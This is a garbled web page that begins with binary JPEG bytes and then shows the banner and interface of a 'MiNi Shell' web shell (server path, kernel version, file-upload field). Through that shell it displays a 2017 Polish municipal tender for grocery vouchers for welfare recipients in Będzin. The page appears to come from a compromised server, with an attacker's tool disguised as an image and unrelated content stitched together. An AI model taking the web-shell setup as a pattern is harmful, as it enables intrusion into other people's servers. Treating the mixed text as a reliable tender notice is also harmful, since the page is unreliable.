JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170206/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170206/20379-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://bedzin.bip.info.pl oraz www.mops.bedzin.pl' target='_blank'>http://bedzin.bip.info.pl oraz www.mops.bedzin.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 20379 - 2017
              z dnia 2017-02-06 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Będzin: Zakup i dostawa bonów towarowych dla podopiecznych Miejskiego Ośrodka Pomocy Społecznej w Będzinie.<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Miejski Ośrodek Pomocy Społecznej, krajowy numer identyfikacyjny
              00344824400000, ul.
              ul. 11 Listopada 
              1,
              42500  
              Będzin, woj.
              śląskie, państwo
              Polska, tel.
              032 2674982; 7614760, 61, e-mail
              mopsbedzin@wp.pl, faks
              032 2674982, 7614760, 7614761.
              <br />
              Adres strony internetowej (URL): bedzin.bip.info.pl oraz www.mops.bedzin.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />bedzin.bip.info.pl oraz www.mops.bedzin.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />bedzin.bip.info.pl oraz www.mops.bedzin.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Ofertę należy złożyć wyłącznie w formie pisemnej pod rygorem nieważności - Zamawiający nie wyraża zgody na złożenie oferty  w postaci elektronicznej podpisanej bezpiecznym podpisem elektronicznym weryfikowanym przy pomocy ważnego kwalifikowanego certyfikatu lub równoważnego środka, spełniającego wymagania dla tego rodzaju podpisu.<br />
                Adres:
                <br />42-500 Będzin, ul. 11-go Listopada 1</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Zakup i dostawa bonów towarowych dla podopiecznych Miejskiego Ośrodka Pomocy Społecznej w Będzinie.<br /><b>Numer referencyjny: </b>ZP PN/01/2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1. Przedmiotem niniejszego zamówienia jest zakup i dostawa bonów towarowych 
dla podopiecznych Miejskiego Ośrodka Pomocy Społecznej w Będzinie 
w następujących  ilościach i nominałach: 
1) 27.000 sztuk w nominałach po 10 złotych,
2) 16.000 sztuk w nominałach po 5 złotych,
to jest zakup i dostawa bonów towarowych o łącznym nominale 350.000 złotych.
Przez zakup i dostawę bonów towarowych Zamawiający rozumie zakup i dostawę bonów towarowych oraz ich realizację w punktach detalicznych, 
w tym w dyskontach i w supermarketach, wskazanych przez Wykonawcę, poprzez sprzedaż artykułów spożywczych, odzieży, obuwia, pościeli, artykułów higieniczno - sanitarnych i środków czystości, artykułów gospodarstwa domowego, leków i innych produktów medycznych - np. opatrunków, czy środków higienicznych, w ramach pomocy podopiecznym Miejskiego Ośrodka Pomocy Społecznej w Będzinie.
2. Podana w ust. 1 niniejszego punktu ogłoszenia ilość poszczególnych nominałów bonów towarowych jest wartością zamówienia podstawowego. Zamawiający przewiduje prawo opcji, o którym mowa w art. 34 ust. 5 ustawy
z dnia 29 stycznia 2004 roku Prawo zamówień publicznych (tekst jednolity: Dz. U. z 2015 r., poz. 2164 ze zm.), zwanej w dalszej części ogłoszenia ustawą, to jest zastrzega sobie możliwość zwiększenia zamówienia podstawowego o zamówienie opcjonalne w ilości nieprzekraczającej, 
w zależności od potrzeb Zamawiającego:
1) 4.000 sztuk w nominałach po 10 złotych,
2) 3.000 sztuk w nominałach po 5 złotych,
to jest zakup i dostawa bonów towarowych o łącznym nominale 55.000 złotych.
Przy ustalaniu wartości niniejszego zamówienia, Zamawiający uwzględnił największy możliwy zakres całego przedmiotu zamówienia, z uwzględnieniem prawa opcji. W przypadku nieskorzystania przez Zamawiającego z prawa opcji lub skorzystania przez Zamawiającego z mniejszej ilości nominałów bonów towarowych objętych zamówieniem opcjonalnym, Wykonawcy nie będą przysługiwać żadne roszczenia finansowe, ani prawne.
3. Zamawiający zastrzega, iż jest możliwe zmniejszenie niniejszego zamówienia w granicach do 20 % w stosunku do wskazanej w ust. 1 niniejszego punktu ogłoszenia ilości bonów towarowych poszczególnych nominałów 
oraz dokonywanie przesunięć ilościowych pomiędzy nominałami bonów i z tego tytułu Wykonawcy nie będą przysługiwać żadne roszczenia finansowe, ani prawne.
4. Z bonów towarowych będących przedmiotem niniejszego zamówienia musi wynikać:
1) wartość nominalna określona w PLN (zgodnie ze wskaźnikami podanymi 
w ust. 1 niniejszego punktu ogłoszenia),
2) liczba miesięcy, w których można zrealizować bon towarowy, przyjmując za datę początkową 01.03.2017 roku,
3) termin realizacji bonów towarowych, który nie może być krótszy niż 18 miesięcy, a dłuższy niż 24 miesiące,
4) napis, z którego treści będzie wynikać, że na jego podstawie nie można dokonać zakupu alkoholu i wyrobów tytoniowych.
5. Wykonawca w załączniku nr 5 do Specyfikacji Istotnych Warunków Zamówienia, zwanej w dalszej części ogłoszenia SIWZ, musi przedstawić wykaz punktów (placówek), w tym dyskontów i supermarketów, w których zaoferowane bony są honorowane, przy czym przedmiotowe punkty (placówki), w tym dyskonty i supermarkety, muszą:
1) znajdować się na terenie gminy miejskiej Będzin - identyfikator i nazwa jednostki podziału terytorialnego kraju - zgodnie z załącznikiem nr 1 
do rozporządzenia Rady Ministrów z dnia 15 grudnia 1998 roku w sprawie szczegółowych zasad prowadzenia, stosowania i udostępniania krajowego rejestru urzędowego podziału terytorialnego kraju oraz związanych z tym obowiązków organów administracji rządowej i jednostek samorządu terytorialnego (Dz. U. Nr 157, poz. 1031 ze zm.): Będzin - 240101 1 oraz
2) oferować łącznie co najmniej następujące artykuły:
a) artykuły spożywcze,
b) odzież,
c) obuwie,
d) pościel,
e) artykuły higieniczno - sanitarne oraz środki czystości,
f) artykuły gospodarstwa domowego,
g) leki i inne produkty medyczne (np. opatrunki, środki higieniczne).
6. Zamawiający wymaga, by w każdym z punktów (placówek), w tym dyskontów 
i supermarketów, wyszczególnionych w Wykazie placówek realizujących bony towarowe na terenie gminy miejskiej Będzin zgodnie z wymaganiami Zamawiającego, stanowiącym załącznik nr 5 do SIWZ, prowadzona była działalność gospodarcza w rozumieniu przepisów o swobodzie działalności gospodarczej na dzień zawarcia umowy w sprawie udzielenia niniejszego zamówienia oraz, by każdy z przedmiotowych punktów (placówek), w tym dyskontów i supermarketów dysponował asortymentem, o którym mowa w ust. 5 pkt 2 niniejszego punktu ogłoszenia, na który składać się musi co najmniej jeden z rodzajów artykułów wymienionych w ust. 5 pkt 2 niniejszego punktu ogłoszenia.
7. Bony towarowe objęte przedmiotem niniejszego zamówienia będą wysyłane przez Wykonawcę na jego koszt, przesyłką kurierską, sukcesywnie według zgłaszanego zapotrzebowania, najpóźniej do 3 dni roboczych po przekazaniu przez Zamawiającego zamówienia wartościowo - ilościowego.
8. Bony towarowe objęte przedmiotem niniejszego zamówienia muszą być talonami w formie papierowej, Zamawiający nie dopuszcza składania ofert 
na bony towarowe w formie elektronicznej (np. karty elektroniczne).
9. Bony towarowe objęte przedmiotem niniejszego zamówienia winny być odpowiednio zabezpieczone przed sfałszowaniem, bez konieczności ich parafowania przez Zamawiającego.
10. Pod pojęciem bonów towarowych należy rozumieć emitowane i oferowane przez Wykonawcę znaki legitymacyjne na okaziciela podlegające wymianie 
na towary w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 roku 
o zwalczaniu nieuczciwej konkurencji (tekst jednolity: Dz. U. z 2003 r. 
Nr 153, poz. 1503 z późn. zm.).
11. Bon towarowy będzie upoważniał podopiecznych Miejskiego Ośrodka Pomocy Społecznej w Będzinie do zakupu artykułów i środków wskazanych w ust. 5 
pkt 2 niniejszego punktu ogłoszenia, z wyłączeniem napojów alkoholowych 
i wyrobów tytoniowych, w punktach (placówkach), w tym dyskontach 
i supermarketach, wyszczególnionych w Wykazie placówek realizujących bony towarowe na terenie gminy miejskiej Będzin zgodnie z wymaganiami Zamawiającego, stanowiącym załącznik nr 5 do SIWZ.
12. Bon towarowy będzie realizowany zawsze do jego pełnej wartości nominalnej. W przypadku, gdy wartość zakupionych towarów będzie niższa 
od wartości nominalnej bonu towarowego, różnica nie będzie zwracana okazicielowi bonu. W sytuacji, gdy wartość zakupionych towarów będzie wyższa od wartości bonu towarowego, jego okaziciel będzie zobowiązany zapłacić różnicę.
13. W przypadku utraty, zniszczenia lub uszkodzenia bonu towarowego, duplikaty nie będą wydawane, z wyjątkiem sytuacji, gdy podopieczny dokona zwrotu wcześniej otrzymanego bonu towarowego, który uległ zniszczeniu, 
a Zamawiający przekaże Wykonawcy zwrócony przez podopiecznego egzemplarz zniszczonego bonu. Ryzyko przypadkowej utraty, zniszczenia lub uszkodzenia bonów przechodzi na Zamawiającego z chwilą ich wydania.
14. Przekazane bony towarowe nie podlegają zwrotowi. Postanowienia ust. 13 niniejszego punktu ogłoszenia stosuje się odpowiednio.
15. Wykonawca nie może wymieniać bonów towarowych na gotówkę. 
16. Zamawiający zastrzega sobie prawo do odstąpienia od płatności za bony towarowe zrealizowane niezgodnie z umową w sprawie udzielenia niniejszego zamówienia, a w szczególności w przypadku: 
1) stwierdzenia wymiany bonów na gotówkę przez pracowników Wykonawcy, 
2) sprzedaży napojów alkoholowych i/lub wyrobów tytoniowych z wykorzystaniem bonów towarowych.
17. Wykonawca jest odpowiedzialny za jakość towarów handlowych w punktach sprzedaży, które będą odpowiadać wymaganiom określonym we właściwych przepisach prawa dotyczących dopuszczenia do obrotu przedmiotowych towarów handlowych. 
18. Wymagana jest należyta staranność przy realizacji zobowiązań wynikających z zawartej z Wykonawcą umowy w sprawie udzielenia niniejszego zamówienia. 
19. Zamawiający nie ponosi odpowiedzialności za szkody poniesione przez Wykonawcę oraz osoby trzecie, wynikające z wykonywania przedmiotu niniejszego zamówienia.<br /><br /><b>II.5) Główny kod CPV: </b>30199750-2<br /><b> Dodatkowe kody CPV:</b>55900000-9<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              405000<br />
              Waluta:
              <br /><div style="padding-left: 20px">PLN<br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 31/12/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b>Zgodnie z art. 24 aa ustawy, Zamawiający najpierw dokona oceny ofert (najwyżej oceniona), a następnie zbada, czy Wykonawca, którego oferta została oceniona jako najkorzystniejsza, nie podlega wykluczeniu (art. 24 ust. 1 pkt 12-23 ustawy oraz wybrane podstawy wykluczenia z art. 24 ust. 5 ustawy), a także spełnia warunki udziału w postępowaniu, określone przez Zamawiającego w Rozdziale IV SIWZ.</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający uzna spełnianie przez Wykonawcę tego warunku, w przypadku gdy Wykonawca ten oświadczy, że posiada kompetencje lub uprawnienia 
do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów, składając oświadczenie według wzoru stanowiącego załącznik nr 3 
do SIWZ.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający uzna spełnianie przez Wykonawcę tego warunku, w przypadku gdy Wykonawca ten oświadczy, że znajduje się w odpowiedniej sytuacji ekonomicznej i finansowej zapewniającej wykonanie niniejszego zamówienia, składając oświadczenie według wzoru stanowiącego załącznik nr 3 do SIWZ.
<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Zamawiający uzna spełnianie przez Wykonawcę tego warunku, w przypadku gdy Wykonawca ten oświadczy, że:
a) posiada odpowiednią wiedzę i doświadczenie do wykonania niniejszego zamówienia, składając oświadczenie według wzoru stanowiącego załącznik nr 3 
do SIWZ;
b) na czas realizacji niniejszego zamówienia będzie dysponował odpowiednim 
do wykonania zamówienia potencjałem technicznym oraz osobami zdolnymi 
do wykonania zamówienia, składając oświadczenie według wzoru stanowiącego załącznik nr 3 do SIWZ.<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">Odpis z właściwego rejestru lub z centralnej ewidencji i informacji 
o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu 
do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia 
na podstawie art. 24 ust. 5 pkt 1 ustawy - w przypadku Wykonawców wspólnie składających ofertę przedmiotowy dokument zobowiązany jest złożyć każdy 
z Wykonawców wspólnie składających ofertę, aktualny na dzień złożenia przedmiotowego dokumentu (odpisu). Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o którym mowa w zdaniu pierwszym powyżej - składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji, ani nie ogłoszono upadłości - przedmiotowy dokument, powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert w niniejszym postępowaniu. Jeżeli w kraju, w którym Wykonawca 
ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa w zdaniu drugim powyżej, zastępuje się je dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych 
do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy 
lub miejsce zamieszkania tej osoby, wystawionym nie wcześniej 
niż 6 miesięcy przed upływem terminu składania ofert w niniejszym postępowaniu;</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />Dokument (np. zobowiązanie) innych podmiotów do oddania Wykonawcy 
do dyspozycji niezbędnych zasobów na potrzeby realizacji niniejszego zamówienia, o ile Wykonawca korzysta ze zdolności innych podmiotów 
na zasadach określonych w art. 22a ustawy, złożony w formie oryginału 
lub kopii poświadczonej za zgodność z oryginałem przez podmiot udostępniający zasoby (zgodnie z Rozdziałem IV ust. 3 SIWZ), aktualny na dzień złożenia przedmiotowego dokumentu (np. zobowiązania) - dotyczy wszystkich warunków udziału w niniejszym postępowaniu.<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Do oferty, w terminie składania ofert w niniejszym postępowaniu, Wykonawca winien również dołączyć następujące dokumenty:
1) Wypełniony formularz oferty (wzór formularza oferty stanowi załącznik 
nr 1 do SIWZ) - w przypadku oferty składanej przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego, formularz oferty musi być złożony wspólnie. 
2) Pełnomocnictwo ustanowione do reprezentowania Wykonawcy/ów ubiegającego/cych się o  udzielenie zamówienia publicznego, o którym mowa 
w Rozdziale V ust. 2 SIWZ i/lub upoważnienie (pełnomocnictwo) do podpisania oferty, o którym mowa w Rozdziale XII ust. 17 SIWZ. Pełnomocnictwo należy dołączyć w oryginale bądź kopii, potwierdzonej za zgodność z oryginałem notarialnie;
